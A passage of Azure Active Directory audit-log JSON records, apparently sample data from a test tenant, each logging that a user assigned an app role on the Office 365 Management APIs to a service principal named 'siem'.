"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": 
"1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": 
"ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 
"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, 
{"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", 
"OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", 
"Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", 